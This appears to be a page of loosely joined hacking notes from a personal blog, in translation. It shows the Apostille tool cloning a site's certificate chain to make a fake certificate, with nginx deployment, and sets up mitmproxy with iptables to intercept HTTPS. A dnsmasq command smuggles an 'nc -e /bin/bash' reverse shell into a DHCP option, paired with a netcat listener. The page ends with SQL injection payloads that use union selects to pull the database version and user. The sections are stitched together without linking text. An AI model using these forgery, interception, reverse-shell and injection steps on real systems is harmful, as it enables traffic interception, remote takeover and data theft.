Articles in the Cybersecurity category

Saw an article on Freebuf:
Technical discussion | Apostille: a certificate forgery tool that makes fake certificates pass for real ones

The tool is written in Java and needs a JDK to run.
Build the jar package with Maven: mvn package

[INFO] Copying bctls-jdk15on-1.58.jar to /root/apostille/target/bctls-jdk15on-1.58.jar
[INFO] Copying hamcrest-core-1.3.jar to /root/apostille/target/hamcrest-core-1.3.jar
[INFO] Copying bcprov-jdk15on-1.58.jar to /root/apostille/target/bcprov-jdk15on-1.58.jar
[INFO] Copying bcpkix-jdk15on-1.58.jar to /root/apostille/target/bcpkix-jdk15on-1.58.jar
[INFO] Copying junit-4.12.jar to /root/apostille/target/junit-4.12.jar
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  03:11 min
[INFO] Finished at: 2019-05-07T14:52:12+08:00
[INFO] ------------------------------------------------------------------------

The jar built successfully.

Usage from the README: java -jar target/apostille-1.0-SNAPSHOT.jar example.com:443 dstkeystore.jks kspassword keypassword > example.com.key+chain

Let's try cloning a certificate chain:

# java -jar target/apostille-1.0-SNAPSHOT.jar feng.cmd.gd:443 fake-cert-feng.cmd.gd.jks kspassword keypassword > fake-feng.cmd.gd.key+chain
Provided keystore now has the following aliases:
Alias: dst root ca x3, added Tue May 07 14:56:35 HKT 2019
Alias: cmd.gd, added Tue May 07 14:56:36 HKT 2019

fake-feng.cmd.gd.key+chain:

Key for cmd.gd
-----BEGIN EC PRIVATE KEY-----
MD...2g==
-----END EC PRIVATE KEY-----
Certificate 1: Subject = CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US
Certificate 1: Issuer  = CN=DST Root CA X3, O=Digital Signature Trust Co.
-----BEGIN CERTIFICATE-----
MI...zQ==
-----END CERTIFICATE-----
Certificate 0: Subject = CN=cmd.gd
Certificate 0: Issuer  = CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US
-----BEGIN CERTIFICATE-----
MI...Ai
-----END CERTIFICATE-----

Note: the certificates in the output are in reverse order; the way nginx deploys them is certificate -> rootCA -> subCA.

Let's look at the certificate properties. On the left is the genuine certificate issued by Let's Encrypt; on the right is the cloned fake certificate.
[image: fake4.png]
[image: fake1.png]

Compare the serial numbers and fingerprints of the two certificates:
[image: fake2.png]
[image: fake3.png]

Let's install it into nginx and see.
Cloning ECC seems to have a problem: the key and certificate fail validation. RSA works fine.

Google Chrome version 76.0.3799.0 (official build) canary (64-bit)
[image: QQ截图20190520094820.png]

Older versions of Chrome might be bypassable lol

Github: https://github.com/sensepost/apostille
Archive: apostille-master(Commits on Jul 23, 2018).zip

source code: https://github.com/mitmproxy/mitmproxy
official website: https://www.mitmproxy.org/

Supports installation via pip and deployment with Docker.
There is also an official packaged exe for Windows.

After installing, start the web interface. The web interface defaults to port 8081 and the proxy to port 8080:
mitmweb --set web_iface=0.0.0.0
The console mitmproxy works too, but it is less convenient than the web UI and adjusting options is more tedious.
In the web UI, option changes take effect as soon as you click. The interface looks like this:
[image: QQ截图20190404141740.png]

Redirect traffic with iptables:

iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
ip6tables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080

Pitfalls encountered while intercepting
The server and mitmproxy ended up using SSLv3; specify the cipher manually to avoid SSLv3.
Use the openssl command to see which cipher the server uses:

# openssl s_client -debug -connect feng.cmd.gd:443
CONNECTED(00000003)
write to 0x55bcecd42820 [0x55bcecd54610] (303 bytes => 303 (0x12F))
......
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-ECDSA-AES256-GCM-SHA384
......
---
^C

Put that cipher into mitmproxy's ciphers_server option and it works; don't prefix it with TLS- lol

dnsmasq --user=root --interface=eth0 --bind-interfaces  --except-interface=lo --dhcp-range=10.10.0.10,10.10.0.20,1h --conf-file=/dev/null --dhcp-option=6,10.10.0.1 --dhcp-option=3,10.10.0.1 --dhcp-option="252,yarrak'&nc -e /bin/bash 10.10.0.3 1337 #" --log-queries --log-facility=/var/log/dnsmasq-server.log
nc -l -p 1337 -v

Guess the number of columns in the query
order by 2 -- , the concatenated SQL statement becomes SELECT first_name, last_name FROM users WHERE user_id = '1' order by 2 -- ';
When the column exists the output is normal; when it doesn't, the error Unknown column '3' in 'order clause' appears.
Use a union query
1' union select 1,2 -- , the concatenated SQL statement becomes SELECT first_name, last_name FROM users WHERE user_id = '1' union select 1,2 -- ';
SELECT first_name, last_name FROM users WHERE user_id = '1' union select version(),user() -- ';